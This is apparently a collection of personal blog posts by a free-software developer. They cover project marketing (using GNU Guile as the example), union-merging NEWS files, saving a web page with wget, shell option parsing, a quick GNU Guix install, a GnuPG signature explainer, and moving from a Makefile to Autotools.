Communicating your project is an essential step for getting the users you want. Here I summarize my experience from working on several different projects including KDE (where I learned the basics of PR - yay, sebas!), the Hurd (where I could really make a difference by improving the frontpage and writing the Month of the Hurd), Mercurial (where I practiced minimally invasive PR) and 1d6 (my own free RPG where I see how much harder it is to do PR, if the project to communicate is your own).

Since voicing the claim that marketing is important often leads to discussions with people who hate marketing of any kind, I added an appendix with an example which illustrates nicely what happens when you don’t do any PR - and what happens if you do PR of the wrong kind.

If you’re pressed for time and want the really short form, just jump to the questionnaire.

What is good marketing?

Before we jump directly to the guide, there is an important term to define: Good marketing. That is the kind of marketing, we want to do.

The definition I use here is this:

Good marketing ensures that the people to whom a project would be useful learn about the project.

and

Good marketing starts with the existing strengths of a project and finds people to whom these strengths are useful.

Thus good marketing does not try to interfere with the greater plan of the project, though it might identify some points where a little effort can make the project much more interesting to users. Instead it finds users to whom the project as it is can be useful - and ensures that these know about the project.

Be fair to competitors, be honest to users, put the project goals before generic marketing considerations.

As such, good marketing is an interface between the project and its (potential) users.

How to communicate your project?

This guide depends on one condition: Your project already has at least one area in which it excels over other projects. If that isn’t the case, please start by making your project useful to at least some people.

The basic way for communicating your project to its potential users always follows the same steps.

To make this text easier to follow, I’ll intersperse it with examples from the latest project where I did this analysis: GNU Guile: The GNU Ubiquitous Intelligent Language for Extensions. Guile provides a nice example, because its mission is clearly established in its name and it has lots of backing, but up until our discussion actually had a wikipedia-page which was unappealing to the point of being hostile against Guile itself.

To improve the communication of our project, we first identify our target groups.

Who are our Target Groups?

To do so, we begin by asking ourselves, who would profit from our project:

  • What can we do well and how do we compare to others?
  • To whom would we already be useful or interesting if people knew about our strengths?
  • To whom are we already the best option?

Try to find about 3 groups of people and give them names which identify them. Those are the people we must reach to grow on the short term.

In the next step, we ask ourselves, whom we want or need as users to fullfill our mission (our long-term goal):

  • Where do we want to get? What is our goal? (do we have a mission statement?)
  • Whom do we need to get there?
  • Whom do we want as users? Those shape us as they take part in the development - either as users or as fellow developers.

Again try to find about 3 groups of people and give them names which identify them. Those are the people we must reach to achieve our longterm goal. If while writing this down you find that one of the already identified groups which we could reach would actually detract us from our goal, mark them. If they aren’t direly needed, we would do best to avoid targeting them in our communication, because they will hinder us in our longterm progress: They could become a liability which we cannot get rid of again.

Now we have about 6 target groups: Those are the people who should know about our project, either because they would benefit from it for pursuing their goals, or because we need to reach them to achieve our own goals. We now need to find out, which kind of information they actually need or search.

Example: Target Groups for Guile

GNU Guile is called The GNU Ubiquitous Intelligent Language for Extensions. So its mission is clear: Guile wants to become the de-facto standard language for extending programs - at least within the GNU project.

For whom are we already useful or interesting? Name them as Target-Groups.
  1. Schemer: Wants to see what GNU Scheme can do.
  2. Extender: GNU enthusiast wants to extend an existing program with a scripting language.
  3. Learner: Free Software enthusiast thinks about using Guile to learn programming
  4. Project-Starter: Experienced Programmer wants to start a new project.
  5. 1337: Programmer wants the coolness-factor.
  6. Emacser: Emacs users want to see what the potential future of Emacs would hold.
Whom do we want as users on the long run? Name them as Target-Groups.
  1. GNU-folk: All GNU developers.

What could they ask?

This part just requires thinking ourselves into the role of each of the target groups. For each of the target groups, ask yourself:

What would you want to know, if you were to read about our project?

As result of this step, we have a set of answers. Judge them on their strengths: Would these answers make you want to invest time to test our project? If not, can we find a better answer?

Example: Questions for the Target-Groups of Guile

  1. Schemer: What can guile do better than other Schemes?
  2. Extender: What does Guile offer my program? Why Guile and not Python/Lua?
  3. Learner: How easy and how powerful is Guile Scheme? Why Guile and not Python?
  4. Starter: What’s the advantage of starting my advanced project with guile?
  5. 1337: Why is guile cool?
  6. Emacser: What does Guile offer for Emacs?
  7. GNU-folk: What does Guile offer my program? (Being a GNU package is a distinct advantage, so there is less competition by non-GNU languages)

Whose wishes can we fullfill?

If our answers for a given group are not yet strong enough, we cannot yet communicate our project convincingly to them. In that case it is best to postpone reaching out to that group, otherwise they could get a lasting weak image of our project which would make it harder to reach them when we have stronger answers at some point in the future.

Remove all groups whose wishes we cannot yet fullfill, or for whom we do not see ourselves as the best choice.

Example: Chosen Target-Groups

  1. Schemer: Guile is a solid implementation of Scheme. For a comparison, see An opinionated Guide to Scheme implementations.
  2. Extender: The guile manual offers a nicely detailed guide for extending a program with Guile. We’re a bit weak on the examples and existing extensions, though, especially on non-GNU-plattforms.
  3. Learner: There aren’t yet tutorials for learning to program in Guile, though there are tutorials for learning to write scheme - and even one for understanding Scheme from the view of a Python-user. But our project resources cannot yet support people who cannot program at all well enough, so we have to restrict ourselves to programmers who want to learn a new language.
  4. Starter: Guile has solid support for many unix-specific things, but it is not yet a complete project-publishing solution. So we have to restrict ourselves to targeting people who want to start a project which is mainly intended to be used in environments with proper package management (mostly GNU/Linux).
  5. 1337: Guile is explicitely named in the GNU Coding Standards. It doesn’t get much cooler than that - at least for a certain idea of cool. We can’t get the Java-1337s, but we can get the Free Software-1337s.
  6. Emacser: Guile provides foreign-function-call. If guile gets used as base for Emacs, Emacs users get direct access to all scheme functions, too - as well as real threading. And that’s pretty strong. Also Geiser provides solid Guile Scheme support in Emacs.
  7. GNU-folk: They are either extenders or project starters or learners, but additionally they want to know in which GNU projects they can use Guile.

Provide those answers!

Now we have answers for the target groups. When we now talk or write about our project, we should keep those target groups in mind.

You can make that arbitrarily complex, for example by trying to find out which of our target groups use which medium. But lets keep it simple:

Ensure that our website (and potentially existing wikipedia page) includes the information which matters to our target groups. Just take all the answers for all the target groups we can already reach and check whether the basic information contained in them is given on the front page of our website.

And if not, find ways to add it.

As next steps, we can make sure that the questions we found for the target groups not only get answered, but directly lead the target groups to actions: For example to start using our project.

Example: The new Wikipedia-Page of Guile

For Guile, we used this analysis to fix the Wikipedia-Page. The old-version mainly talked about history and weaknesses (to the point of sounding hostile towards Guile), and aside from the latest release number, it was horribly outdated. And it did not provide the information our target groups required.

The current Wikipedia-Page of GNU Guile works much better - for the project as well as for the readers of the page. Just compare them directly and you’ll see quite a difference. But aside from sounding nicer, the new site also addresses the questions of our target groups. To check that, we now ask: Did we include information for all the potential user-groups?

  1. Schemers: Yepp (it’s scheme and there’s a section on Guile Scheme
  2. Extenders: Yepp (libguile)
  3. Learners: Not yet. We might need a syntax-section with some examples. But wikipedians do not like Howto-Like sections. Also the interpreter should get a notice.
  4. Project-Starters: Partly in the “core idea”-part in the section Guile Scheme. It might need one more paragraph showing advantages of Guile which make it especially suited for that.
  5. 1337s: It is the preferred extension system for the GNU Project. If you’re not that kind of 1337: The Macro-System is hygienic (no surprising side-effects).
  6. Emacs users: They got their own section.
  7. GNU-Folk: They have a section on Guile in make. We should add a list of GNU projects with Guile support.

So there you go: Not perfect, but most of the groups are covered. And this also ensures that the Wikipedia-page is more interesting to its readers: A clear win-win.

Further points

Additional points which we should keep in mind:

  • On the website, do all of our target groups quickly find their way to advanced information about their questions? This is essential to keep the ones interested who aren’t completely taken by the short answers.
  • What is a common negative misconception about our project? We need to ensure that we do not write anything which strengthens this misconception. Is there an existing strength, which we can show to counter the negative misconception?
  • Where do we want to go? Do we have a mission statement?

bab-com q: Arne Babenhauserheide’s Project Communication Questionaire

  • For whom are we already useful or interesting? Name them as Target-Groups.

    • (1)
    • (2)
    • (3)
  • Whom do we want as users on the long run? Name them as Target-Groups.

    • (4)
    • (5)
    • (6)
  • What could the Target-Groups ask? What are their needs? Formulate them as questions.
    • (1)
    • (2)
    • (3)
    • (4)
    • (5)
    • (6)
  • Answer their questions.
    • (1)
    • (2)
    • (3)
    • (4)
    • (5)
    • (6)
  • Whose needs can we already fulfill well? For whom do we see ourselves as the best choice?
    • (1)
    • (2)
    • (3)
    • (4)
  • Ensure that our communication includes the answers to these questions (i.e. website, wikipedia page, talks, …), at least for the groups who are likely to use the medium on which we communicate!

Use bab-com to avoid bad-com ☺ - yes, I know this phrase is horrible, but it is catchy and that fits this article: you need catchy things

Note: The mission statement

The mission statement is a short paragraph in which a project defines its goal.

A good example is:

Our mission is to create a general-purpose kernel suitable for the GNU operating system, which is viable for everyday use, and gives users and programs as much control over their computing environment as possible.GNU Hurd mission explained

Another example again comes from Guile:

Guile was conceived by the GNU Project following the fantastic success of Emacs Lisp as an extension language within Emacs. Just as Emacs Lisp allowed complete and unanticipated applications to be written within the Emacs environment, the idea was that Guile should do the same for other GNU Project applications. This remains true today.Guile and the GNU project

Closely tied to the mission statement is the slogan: A catch-phrase which helps anchoring the gist of your project in your readers mind. Guile does not have that, yet, but judging from its strengths, the following could work quite well for Guile 2.0 - though it falls short of Guile in general:

GNU Guile scripting: Use Guile Scheme, reuse anything.

Summary

We saw why it is essential to communicate the project to the outside, and we discussed a simple structure to check whether our way of communication actually fits our projects strengths and goals.

Finding the communication strategy actually boils down to 3 steps:

  • Target those who would profit from our project or whom we need.
  • Check what they need to know.
  • Answer that.

Also a clear mission statement, slogan and project description help to make the project more tangible for readers. In this context, good marketing means to ensure that the right people learn about the real strengths of the project.

With that I’ll conclude this guide. Have fun and happy hacking!
— Arne Babenhauserheide


Appendix: Why communicating your project?

In free software we often think that quality is a guarantee for success. But in just the 10 years I’ve been using free software nowadays, I saw my share of technically great projects succumbing to inferior projects which simply reached more people and used that to build a dynamic which greatly outpaced the technically better product.

One example for that are pkgcore and paludis. When portage, the package manager of Gentoo, grew too slow because it did ever more extensive tests, two teams set out to build a replacement.

One of the teams decided that the fault of the low performance lay in Python, the language used by portage. That team built a package manager in C++ and had --wonderfully-long-command-options without shortcuts (have fun typing), and you actually had to run it twice: Once to see what would get installed and then again to actually install it (while portage had had an --ask option for ages, with -a as shortcut). And it forgot all the work it had done in the previous run, so you could wait twice as long for the result. They also had wonderful latin names, and they managed the feat of being even slower than portage, despite being written in C++. So their claim that C++ would be magically faster than python was simply wrong (because they skipped analyzing the real performance bottlenecks). They called their program paludis.

Note: Nowadays paludis has a completely new commandline interface which actually supports short command options. That interface is called cave and looks sane.

The other team did a performance analysis and realized that the low performance actually lay with the filesystem: The portage tree, which holds the required information, contains about 30,000 ebuilds and almost 200,000 files in total, and portage accessed far more of those files than actually needed for resolving the dependencies needed to install the package. They picked python as their language - just like portage. They used almost the same commandline options as portage, except for the places where functionality differed. And they actually got orders of magnitude faster than portage - so fast that their search command often finished after less than a second while. portage took over 10 seconds. They called their program pkgcore.

Both had more exact resolution of packages and could break cyclic dependencies and so on.

So, judging from my account of the quality, which project would you expect to succeed?

I sure expected pkgcore to replace portage within a few months. But this is not what happened. And as I see it in hindsight, the difference lay purely in PR.

The paludis team with their slow and hard-to-use program went all over the Gentoo forums claiming that Python is a horrible language and that a C program will kick portage any time. On their website they repeated their attacks against python and claimed superiority at every step. And they gathered quite a few zealots. While actually being slower than portage. Eventually they rebranded paludis as just better and more correct, not faster. And they created their own distribution (exherbo) as direct rival of Gentoo. With a new, portage-incompatible package format. As if they had read the book, how not to be a friendly competitor.

The pkgcore team on the other hand focussed on good technology. They created the snakeoil library for high-performance python code, but they were friendly about it and actually contributed back to portage where code could be shared. But their website was out of date, often not noting the newest release and you actually had to run pmerge --help to see the most current commandline options (though you could simply guess them if you knew portage). And they got attacked by paludis zealots so much, that this year the main developer finally sacked the project: He told me on IRC that he had taken so much vitriol over the years that it simply wasn’t worth the cost anymore.

Update: About a year later someone else took over. Good code often survives the loss of its creator.

So, what can we learn from this? Technical superiority does not gain you anything, if you fail to convince people to actually use your project.

If you don't communicate your project, you don't get users. If you don’t get users, your chances of losing motivation are orders of magnitude higher than if you get users who support you.

And aggressive marketing works, even if you cannot actually deliver on your promises. Today they have a better user-interface and even short option-names. But even to date, exherbo has much fewer packages in its repositories than Gentoo. If the number of files is any measure, the 10,000 files in their special repositories are just about 5% of the almost 200,000 files portage holds. But they managed quite well to fraction the Gentoo users - at least for some time. And their repeated pushes for new standards in the portage tree (EAPIs) created a constant pressure on pkgcore to adapt, which had the effect that nowadays pkgcore cannot install from the portage tree anymore (the search still works, though, and I still use it - I will curse mightily on the day they manage to also break that).

Update: Someone else took over and now pkgcore can install again.

So aggressive marketing and doing everything in the book of unfriendly competition might have allowed the paludis devs to gather some users and destroy the momentum of pkgcore, but it did not allow them to actually become a replacement of portage within Gentoo. Their behaviour alienated far too many people for that. So aggressive and unfriendly marketing is better than no marketing, but it has severe drawbacks which you will likely want to avoid.

If you use overly aggressive, unfriendly or dishonest communication tactics, you get some users, but if your users know their stuff, you won’t win the mindshare you need to actually make a difference.

If on the other hand you want to see communication done right, just take a look at KDE and Gnome nowadays. They cooperate quite well, and they compete on features and by improving their project so users can take an informed choice about the project they choose.

And their number of contributors steadily keeps growing.

So what do they do? Besides being technically great, it boils down to good marketing.

Conveniently merge a NEWS file without conflicts

Writing a NEWS file (a list of changes per version, targeted at end-users) significantly reduces the effort for doing a release: To write your release notes, just copy the latest entries from the NEWS file into a message. It is one of the gems in the GNU coding standards: Simple yet extremely useful. (For a detailed realization, refer to the Perl Specification for CPAN Changes files.)

However when you’re developing features in parallel, for example by using a pull-request workflow and requiring contributors to update the NEWS file, you will often run into merge conflicts. Resolving these takes time, though the resolution is trivial: Just use the lines from both heads.

To resolve the problem, you can set your version tracking system to use union-merge for NEWS files.

Table of Contents

Mercurial

echo "
[merge-patterns]
# avoid bogus conflicts in NEWS files
NEWS = internal:union
" >> .hg/hgrc

(necessary for each contributor to avoid surprising users)

Git

echo "/NEWS merge=union" >> .gitattributes
git add .gitattributes
git commit -m "union-merge NEWS" .gitattributes

(committed, so it sticks, but might mislead contributors into missing genuine conflicts, because a contibutor does not necessarily know about the setting)

Download one page from a website with all its prerequisites

Often I want to simply backup a single page from a website. Until now I always had half-working solutions, but today I found one solution using wget which works really well, and I decided to document it here. That way I won’t have to search it again, and you, dear readers, can benefit from it, too ☺

Update 2020: You can also use the copyweb-script from pyFreenet: copyweb -d TARGET_FOLDER URL
Install via pip3 install --user pyFreenet3.

In short: This is the command:

wget --no-parent --timestamping --convert-links --page-requisites --no-directories --no-host-directories --span-hosts --adjust-extension --no-check-certificate -e robots=off -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4' [URL]

Optionally add --directory-prefix=[target-folder-name]

(see the meaning of the options and getting wget for some explanation)

That’s it! Have fun copying single sites! (but before passing them on, ensure that you have the right to do it)

Does this really work?

As a test, how about running this:

wget -np -N -k -p -nd -nH -H -E --no-check-certificate -e robots=off -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4' --directory-prefix=download-web-site http://draketo.de/english/download-web-page-with-all-prerequisites

(this command uses the short forms of the options)

Then test the downloaded page with firefox:

firefox download-web-site/download-web-page-all-prerequisites.html

Getting wget

If you run GNU/Linux, you likely already have it - and if not, then your package manager has it. GNU wget is one of the standard tools available everywhere.

Some information in the (sadly) typically terse style can be found on the wget website from the GNU project: gnu.org/s/wget.

In case you run Windows, have a look at Wget for Windows from the gnuwin32 project or at GNU Wgetw for Windows from eternallybored.

Alternatively you can get a graphical interface via WinWGet from cybershade.

Or you can get serious about having good tools and install MSYS or Cygwin - the latter gets you some of the functionality of a unix working environment on windows, including wget.

If you run MacOSX, either get wget via fink, homebrew or MacPorts or follow the guide from osxdaily or the german guide from dirk (likely there are more guides - these two were just the first hits in google).

The meaning of the options (and why you need them):

  • --no-parent: Only get this file, not other articles higher up in the filesystem hierarchy.
  • --timestamping: Only get newer files (don’t redownload files).
  • --page-requisites: Get all files needed to display this page.
  • --convert-links: Change files to point to the local files you downloaded.
  • --no-directories: Do not create directories: Put all files into one folder.
  • --no-host-directories: Do not create separate directories per web host: Really put all files in one folder.
  • --span-hosts: Get files from any host, not just the one with which you reached the website.
  • --adjust-extension: Add a .html extension to the file.
  • --no-check-certificate: Do not check SSL certificates. This is necessary if you’re missing one of the host certificates one of the hosts uses. Just use this. If people with enough power to snoop on your browsing would want to serve you a changed website, they could simply use one of the fake certifications authorities they control.
  • -e robots=off: Ignore robots.txt files which tell you to not spider and save this website. You are no robot, but wget does not know that, so you have to tell it.
  • -U 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4': Fake being an old Firefox to avoid blocking based on being wget.
  • --directory-prefix=[target-folder-name]: Save the files into a subfolder to avoid having to create the folder first. Without that options, all files are created in the folder in which your shell is at the moment. Equivalent to mkdir [target-folder-name]; cd [target-folder-name]; [wget without --directory-prefix]

Conclusion

If you know the required options, mirroring single pages from websites with wget is fast and easy.

Note that if you want to get the whole website, you can just replace --no-parent with --mirror.

Happy Hacking!

Elegant commandline argument parsing on the shell

Parsing command line arguments on the shell is often done in an ad-hoc fashion, growing unwieldy as time goes by, but there are tools to make that elegant. Here’s a complete example.

I use this in the conf project (easy setup of autotools projects). It builds on the great solution by Adam Katz.

# outer loop to allow processing option arguments at the end
while test ! $# -eq 0; do
    # getopts loop, here you define the short options: 
    # h for -h, l: for -l <lang>. -: provides support for long-options.
    while getopts -- hl:-: arg "$@"; do
        case $arg in
            h ) ARG_HELP=true ;;
            l ) ARG_LANG="$OPTARG" ;;
            - ) LONG_OPTARG="${OPTARG#*=}"
                case "$OPTARG" in
                    help    ) ARG_HELP=true;;
                    lang=?* ) ARG_LANG="$LONG_OPTARG" ;;
                    # FIXME: using the same option twice (either both
                    # after the argument or both before it) gives the
                    # first, not the second value
                    lang*   ) ARG_LANG="${@:$OPTIND:1}" ; OPTIND=$(($OPTIND + 1));;
                    vcs=?*  ) ARG_VCS="$LONG_OPTARG" ;;
                    vcs*    ) ARG_VCS="${@:$OPTIND:1}" ; OPTIND=$(($OPTIND + 1));;
                    '' )      break ;; # "--" terminates argument
                                       # processing to allow giving
                                       # options for autogen.sh after
                                       # --
                    * )       echo "Illegal option --$OPTARG" >&2; exit 2;;
                esac;;
            \? ) exit 2 ;;  # getopts already reported the illegal
                            # option
        esac
    done
    shift $((OPTIND-1)) # remove parsed options and args from $@ list
    # reinitialize OPTIND to allow parsing again
    OPTIND=1
    # provide help output.
    if test x"${ARG_HELP}" = x"true"; then
        echo "${PROG} new [-h | --help] [-l | --lang <LANGUAGE>] [--vcs <VCS>] PROJECT_NAME"
        exit 0
    fi
    # get the argument
    if test x"${1}" = x"--"; then
        if test x"${PROJ}" = x""; then
            echo "Missing project name." >&2; exit 2
        else
            # nothing more to parse.
            # Remove -- from the remaining arguments
            shift 1
            break
        fi
    fi
    if test ! x"${1}" = x""; then
        PROJ="${1%/}" # without trailing slash
    fi
    # remove the argument, then continue the loop to allow putting
    # the options after the argument
    shift 1
done

Additional explanation for this is available from Adam Katz (2015). I’m allowed to include it here, because every answer on Stackoverflow is licensed under creativecommons attribution sharealike (cc by-sa) and because cc by-sa is upwards compatible to GPLv3.

# From Adam Katz, 2015: http://stackoverflow.com/users/519360/adam-katz
# Available at http://stackoverflow.com/a/28466267/7666
# License: cc by-sa: https://creativecommons.org/licenses/by-sa/3.0/
while getopts ab:c-: arg; do
  case $arg in
    a )  ARG_A=true ;;
    b )  ARG_B="$OPTARG" ;;
    c )  ARG_C=true ;;
    - )  LONG_OPTARG="${OPTARG#*=}"
         case $OPTARG in
           alpha    )  ARG_A=true ;;
           bravo=?* )  ARG_B="$LONG_OPTARG" ;;
           bravo*   )  echo "No arg for --$OPTARG option" >&2; exit 2 ;;
           charlie  )  ARG_C=true ;;
           alpha* | charlie* )
                       echo "No arg allowed for --$OPTARG option" >&2; exit 2 ;;
           '' )        break ;; # "--" terminates argument processing
           * )         echo "Illegal option --$OPTARG" >&2; exit 2 ;;
         esac ;;
    \? ) exit 2 ;;  # getopts already reported the illegal option
  esac
done
shift $((OPTIND-1)) # remove parsed options and args from $@ list

With this and with the practical usage at the top you should be able to implement clean commandline parsing with ease.

Happy Hacking!

GNU Guix in 5 minutes

So you get excited when you hear about surviving a power-outage during updates without a hitch and you want to give Guix a try — but woes, you only have 5 minutes of time?

Fear not, that’s enough to get it up and running — all the way to per-user environments and package install as non-priviledged user!

The instructions here are from the official docs, specialized for a GNU Linux host and cut to what I need in a working system.

as user:

$ cd /tmp
$ wget ftp://alpha.gnu.org/gnu/guix/guix-binary-0.8.3.x86_64-linux.tar.xz

become root

$ sudo screen

unpack install and setup Guix

# tar xf guix-binary-0.8.3.x86_64-linux.tar.xz 
# mv var/guix /var/ && mv gnu /
# ln -sf /var/guix/profiles/per-user/root/guix-profile ~root/.guix-profile

Create the build users as per Build-Environment-Setup:

# groupadd --system guixbuild
# for i in `seq -w 1 10`;
   do
      useradd -g guixbuild -G guixbuild           \
              -d /var/empty -s `which nologin`    \
              -c "Guix build user $i" --system    \
              guixbuilder$i;
   done

Run the daemon:

# ~root/.guix-profile/bin/guix-daemon --build-users-group=guixbuild

Switch to a second root window with CTRL-a c to adjust the PATH, allow substitutes from the Hydra build server, and to install and set locales (required since we’re installing an overlay, not a full distro).

# echo 'PATH="$HOME/.guix-profile/bin:$HOME/.guix-profile/sbin:${PATH}"' >> $HOME/.bashrc
# echo 'export LOCPATH=$HOME/.guix-profile/lib/locale'  >> $HOME/.bashrc
# source $HOME/.bashrc
# guix archive --authorize < ~root/.guix-profile/share/guix/hydra.gnu.org.pub
# guix package -i glibc-utf8-locales

Allow all users to use the guix command (as long as guix-daemon is running):

# mkdir -p /usr/local/bin
# cd /usr/local/bin
# ln -s /var/guix/profiles/per-user/root/guix-profile/bin/guix

Switch back to your regular user and provide the guix profile. Also install the locales (remember that the installation is really per-user, though the users share packages if they install them both). The per-user profile will be generated the first time you run guix package.

$ ln -sf /var/guix/profiles/per-user/$(whoami)/guix-profile ~/.guix-profile
$ echo 'export PATH="$HOME/.guix-profile/bin:$HOME/.guix-profile/sbin:${PATH}"' >> $HOME/.bashrc
$ echo 'export LOCPATH=$HOME/.guix-profile/lib/locale'  >> $HOME/.bashrc
$ source $HOME/.bashrc
$ guix package -i glibc-utf8-locales

And now:

$ guix package -i guile-emacs --fallback
$ ~/.guix-profile/bin/emacs -Q

So you believed that only a pipe-dream, just like power-loss-resistant updates and functional packaging using the official GNU extension language? I was glad to be proven wrong, and I hope you’ll feel the same ☺ (though guile-emacs is still experimental it already allows calling elisp functions directly from scheme)

Happy Hacking!

GnuPG/PGP signature, short explanation

»What is the .asc file?« This explanation is intended to be copied as-is into emails when someone asks about your signature.

The .asc file is a signature which can be used to verify that the email was really sent by me and wasn’t tampered with.[1] It can be verified with standard email security tools like Enigmail[2], Gpg4win[3] or MacGPG[4] - and others tools supporting OpenPGP[5].

Best wishes,
Arne

[1]: For further information on signatures see
    https://www.gnupg.org/gph/en/manual/x135.html

[2]: Enigmail enables secure communication in Thunderbird:
    https://addons.mozilla.org/de/thunderbird/addon/enigmail/

[3]: GPG4win provides secure encryption for Windows:
    http://gpg4win.org/download.html

[4]: MacGPG provides encryption for MacOSX:
    https://gpgtools.org/

[5]: Encryption for other systems is available from the GnuPG website:
    https://www.gnupg.org/download/

Going from a simple Makefile to Autotools

Table of Contents

Links

Intro

I recently started looking into Autotools, to make it easier to run my code on multiple platforms.

Naturally you can use cmake or scons or waf or ninja or tup, all of which are interesting in there own respect. But none of them has seen the amount of testing which went into autotools, and none of them have the amount of tweaks needed to support about every system under the sun. And I recently found pyconfigure which allows using autotools with python and offers detection of library features.

Warning 2016: Contains some cargo-cult-programming — my current setup is cleaner thanks to using AC_CONFIG_LINKS in configure.ac.

I had already used Makefiles for easily storing the build information of anything from python projects (python setup.py build) to my PhD thesis with all the required graphs.

I also had used scons for those same tasks.

But I wanted to test, what autotools have to offer. And I found no simple guide which showed me how to migrate from a Makefile to autotools - and what I could gain through that.

So I decided to write one.

My Makefile

The starting point is the Makefile I use for building my PhD. That’s pretty generic and just uses the most basic features of make.

If you do not know it yet: A basic makefile has really simple syntax:

# comments start with #
thing : required source files # separated by spaces
    build command
    second build command
# ^ this is a TAB.

The code above is a rule. If you put a file with this content into some folder using the filename Makefile and then run make thing in that folder (in a shell), the program “make” will check whether the source files have been changed after it last created the thing and if they have been changed, it will execute the build commands.

You can use things from other rules as source file for your thing and make will figure out all the tasks needed to create your thing.

My Makefile below creates plots from data and then builds a PDF from an org-mode file.

all: doktorarbeit.pdf sink.pdf

sink.pdf : sink.tex images/comp-t3-s07-tem-boas.png images/comp-t3-s07-tem-bona.png images/bona-marble.png images/boas-marble.png
    pdflatex sink.tex
    rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb # kill litter

comp-t3-s07-tem-boas.png comp-t3-s07-tem-bona.png : nee-comp.pyx nee-comp.txt
    pyxplot nee-comp.pyx

doktorarbeit.pdf : doktorarbeit.org
    emacs --batch --visit "doktorarbeit.org" --funcall org-export-as-pdf  

Feature Equality

The first step is simple: How can I replicate with autotools what I did with the plain Makefile?

For that I create the files configure.ac and Makefile.am. The basic Makefile.am is simply my Makefile without any changes.

The configure.ac sets the project name, inits automake and tells autoreconf to generate a Makefile.

dnl run `autoreconf -i` to generate a configure script. 
dnl Then run ./configure to generate a Makefile.
dnl Finally run make to generate the project.

AC_INIT([Doktorarbeit Inverse GHG], [0.1], [arne.babenhauserheide@kit.edu])
dnl we use the build type foreign here instead of gnu because I do not have a NEWS file and similar, yet.
AM_INIT_AUTOMAKE([foreign])
AC_CONFIG_FILES([Makefile])
AC_OUTPUT

Now, if I run `autoreconf -i` it generates a Makefile for me. Nothing fancy here: The Makefile just does what my old Makefile did.

First milestone reached: Feature Equality!

But the generated Makefile is much bigger, offers real –help output and can generate a distribution - which does not work yet, because it misses the source files. But it clearly tells me that with `make distcheck`.

make dist: distributing the project

Since `make dist` does not work yet, let’s change that.

… easier said than done. It took me the better part of a day to figure out how to make it happy. Problems there:

  • I have to explicitely give automake the list of sources so it can copy them to the distributed package.
  • distcheck uses a separate build dir. Yes, this is the clean way, but it needs some hacking to get everything to work.
  • I use pyxplot for generating some plots. Pyxplot does not have a way (I know of) to search for datafiles in a different folder. I have to copy the files to the build dir and kill them after the build. But only if I use a separate build dir.
  • pdflatex can’t find included images. I have to adapt the TEXINPUT environment variable to give it the srcdir as additional search path.
  • Some of my commands litter the build directory with temporary or intermediate files. I have to clean them up.

So, after much haggling with autotools, I have a working make distcheck:

pdf_DATA = sink.pdf doktorarbeit.pdf

sink = sink.tex
pkgdata_DATA = images/comp-t3-s07-tem-boas.png images/comp-t3-s07-tem-bona.png
dist_pkgdata_DATA = images/bona-marble.png images/boas-marble.png

plotdir = .
dist_plot_DATA = nee-comp.pyx nee-comp.txt

doktorarbeit = doktorarbeit.org

EXTRA_DIST = ${sink} ${dist_pkgdata_DATA} ${doktorarbeit}

MOSTLYCLEANFILES = \#* *~ *.bak # kill editor backups
CLEANFILES = ${pdf_DATA}
DISTCLEANFILES = ${pkgdata_DATA}

sink.pdf : ${sink} ${pkgdata_DATA} ${dist_pkgdata_DATA}
    TEXINPUTS=${TEXINPUTS}:$(srcdir)/:$(srcdir)/images// pdflatex $<
    rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb # kill litter

${pkgdata_DATA} : ${dist_plot_DATA}
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then cp -u "$(i)" "$(notdir $(i))"; fi;)
    ${MKDIR_P} images
    pyxplot $<
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then rm -f "$(notdir $(i))"; fi;)

doktorarbeit.pdf : ${doktorarbeit}
    if test "$<" != "$(notdir $<)"; then cp -u "$<" "$(notdir $<)"; fi
    emacs --batch --visit "$(notdir $<)" --funcall org-export-as-pdf
    if test "$<" != "$(notdir $<)"; then rm -f "$(notdir $<)"; rm -f $(basename $(notdir $<)).tex $(basename $(notdir $<)).tex~; else rm -f $(basename $<).tex $(basename $<).tex~; fi

You might recognize that this is not the simple Makefile anymore. It is now a setup which defines files for distribution and has custom rules for preparing script runs and for cleanup.

But I can now make a fully working distribution, so when I want to publish my PhD thesis, I can simply add the generated release tarball. I work in a Mercurial repo, so I would more likely just include the repo, but there might be reasons for leaving out the history - and be it only that the history might grow quite big.

Second milestone reached: make distcheck!

An advantage is that in the process of preparing the dist, my automake file got cleanly separated into a section defining files and dependencies and one defining build rules.

But I now also understand where newer build tools like scons got their inspiration for the abstractions they use.

I should note, however, that if you were to build a software project in one of the languages supported by automake (C, C++, Python and quite a few others), I would not have needed to specify the build rules myself.

And being able to freely mix the dependency declaration in automake style with Makefile rules gives a lot of flexibility which I missed in scons.

Finding programs

Now I can build and distribute my project, but I cannot yet make sure that the programs I need for building actually exist.

And that’s finally something which can really help my build, because it gives clear error messages when something is missing, and it allows users to specify which of these programs to use via the configure script. For example I could now build 5 different versions of Emacs and try the build with each of them.

Also I added cross compilation support, though that is a bit over the top for simple PDF creation :)

Firstoff I edited my configure.ac to check for the tools:

dnl run `autoreconf -i` to generate a configure script. 
dnl Then run ./configure to generate a Makefile.
dnl Finally run make to generate the project.

AC_INIT([Doktorarbeit Inverse GHG], [0.1], [arne.babenhauserheide@kit.edu])
# Check for programs I need for my build
AC_CANONICAL_TARGET
AC_ARG_VAR([emacs], [How to call Emacs.])
AC_CHECK_TARGET_TOOL([emacs], [emacs], [no])
AC_ARG_VAR([pyxplot], [How to call the Pyxplot plotting tool.])
AC_CHECK_TARGET_TOOL([pyxplot], [pyxplot], [no])
AC_ARG_VAR([pdflatex], [How to call pdflatex.])
AC_CHECK_TARGET_TOOL([pdflatex], [pdflatex], [no])
AS_IF([test "x$pdflatex" = "xno"], [AC_MSG_ERROR([cannot find pdflatex.])])
AS_IF([test "x$emacs" = "xno"], [AC_MSG_ERROR([cannot find Emacs.])])
AS_IF([test "x$pyxplot" = "xno"], [AC_MSG_ERROR([cannot find pyxplot.])])
# Run automake
AM_INIT_AUTOMAKE([foreign])
AM_MAINTAINER_MODE([enable])
AC_CONFIG_FILES([Makefile])
AC_OUTPUT

